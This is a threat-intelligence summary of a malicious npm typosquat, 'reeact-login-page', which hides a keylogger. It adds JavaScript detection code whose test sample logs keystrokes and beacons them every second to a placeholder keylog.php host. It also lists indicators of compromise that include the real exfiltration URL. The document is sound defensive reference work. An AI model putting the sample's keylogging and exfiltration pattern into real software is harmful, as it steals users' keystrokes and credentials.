Summary:
The article discusses a malicious npm package named “reeact-login-page,” which is a typosquatting attack designed to capture keystrokes and exfiltrate sensitive data. The package masquerades as a legitimate React component, making it difficult for developers to detect its malicious intent. The Socket Research team has flagged this package and others by the same author as malware, emphasizing the importance of careful vetting of npm packages to avoid such threats.
#Typosquatting #MaliciousPackages #ReactSecurity
Keypoints:
- The “reeact-login-page” package is a typosquatting attack that includes a keylogger.
- The package mimics the legitimate “react-login-page” package to gain credibility.
- Malicious code captures keystrokes and sends them to a remote server.
- It fetches the user’s IP address from an external service.
- Data is sent every second to a specified URL using an image request to bypass CORS restrictions.
- The author has multiple similarly named malicious packages on npm.
- Socket has flagged these packages as malware and alerted the registry for removal.
- Developers are advised to carefully vet npm packages to avoid security risks.
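The following is an added example, not code from the Socket article or from the package it analyses. It shows two defender-side checks that follow directly from the key points above: a typosquat check that flags dependency names one or two edits away from a well-known package (the "reeact" vs "react" pattern), and a static heuristic that scores source text for the combination of behaviours the article describes (keystroke listener, one-second timer, image-request beacon, external IP lookup). The known-package list, the indicator regexes and the two sample source strings are constructed for this demonstration; the suspicious sample only mirrors the shape of the described behaviour and uses a placeholder host.

```javascript
// Added example (not from the Socket article): two defender-side checks that a
// CI step could run before installing dependencies or merging a package update.
//  1. typosquatFindings(): flag dependency names within a small edit distance of
//     a well-known package name (e.g. "reeact-login-page" vs "react-login-page").
//  2. keyloggerIndicators(): static heuristic over package source text for the
//     behaviours the article describes. Each indicator alone is common in benign
//     code; several together on a small login component are worth a manual look.
// The known-package list and sample sources below are constructed for this demo.

const KNOWN_PACKAGES = ["react", "react-dom", "react-login-page", "lodash", "express"];

// Classic Levenshtein edit distance (insertions, deletions, substitutions).
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// Return [{ name, lookalike, distance }] for every dependency whose name is not
// itself a known package but sits within maxDistance edits of one.
function typosquatFindings(dependencyNames, known = KNOWN_PACKAGES, maxDistance = 2) {
  const findings = [];
  for (const name of dependencyNames) {
    if (known.includes(name)) continue;
    for (const k of known) {
      const d = editDistance(name, k);
      if (d > 0 && d <= maxDistance) findings.push({ name, lookalike: k, distance: d });
    }
  }
  return findings;
}

// Behavioural indicators derived from the article's description of the package.
const INDICATORS = [
  { id: "keystroke-listener", re: /addEventListener\s*\(\s*["'`]key(down|press|up)["'`]/ },
  { id: "periodic-timer", re: /setInterval\s*\(/ },
  { id: "image-beacon", re: /new\s+Image\s*\(\s*\)[\s\S]{0,200}?\.src\s*=/ },
  { id: "external-ip-lookup", re: /api\.ipify\.org/ },
  { id: "remote-php-endpoint", re: /https?:\/\/[^"'`\s]+\.php\?/ },
];

// Return the ids of every indicator whose pattern matches the given source text.
function keyloggerIndicators(source) {
  return INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
}

// Constructed sample in the *shape* the article describes (not the real package
// code): key listener, IP lookup, and an <img> beacon fired every second.
const SAMPLE_SUSPICIOUS = `
let buf = "";
document.addEventListener("keydown", (e) => { buf += e.key; });
fetch("http://api.ipify.org/?format=json");
setInterval(() => { const i = new Image(); i.src = "https://example.invalid/keylog.php?c=" + encodeURIComponent(buf); }, 1000);
`;

// Constructed benign sample: a plain component with none of the indicators.
const SAMPLE_BENIGN = `
export function LoginForm({ onSubmit }) { return null; }
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(typosquatFindings(["react", "reeact-login-page", "lodash"]));
  console.log(keyloggerIndicators(SAMPLE_SUSPICIOUS));
  console.log(keyloggerIndicators(SAMPLE_BENIGN));
}

if (typeof module !== "undefined") {
  module.exports = { editDistance, typosquatFindings, keyloggerIndicators, SAMPLE_SUSPICIOUS, SAMPLE_BENIGN };
}
```

In practice the known-package list would be the project's own lockfile names plus a download-ranked list from the registry, and the indicator pass would run over the unpacked tarball rather than a string; the thresholds here (two edits, any indicator hit) are deliberately loose so that a reviewer, not the script, makes the final call.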
MITRE Techniques:
- Data Obfuscation (T1027): The malicious code uses a separate file to store sensitive variables, making detection more challenging.
- Credential Dumping (T1003): The keylogger captures keystrokes, potentially including user credentials.
- Exfiltration Over Command and Control Channel (T1041): Data is sent to a remote server using an image request to avoid detection.
IoC:
- [URL] hxxps://adlinczewska.pl/beaut-login/keylog.php?c=
- [URL] hxxp://api.ipify.org/?format=json
Full Research: https://socket.dev/blog/malicious-npm-package-typosquats-react-login-page-to-deploy-keylogger